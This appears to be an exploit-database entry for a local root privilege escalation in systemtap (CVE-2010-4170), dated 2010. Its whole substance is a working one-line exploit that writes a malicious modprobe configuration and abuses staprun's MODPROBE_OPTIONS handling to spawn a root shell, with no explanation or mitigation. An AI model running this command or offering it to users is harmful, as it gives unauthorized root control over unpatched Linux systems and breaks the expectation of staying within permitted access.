ExploitFixes
Local Root Privilege Escalation Vulnerability in systemtap - [CVE: 2010-4170] 2010-11-26 15:15:05

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever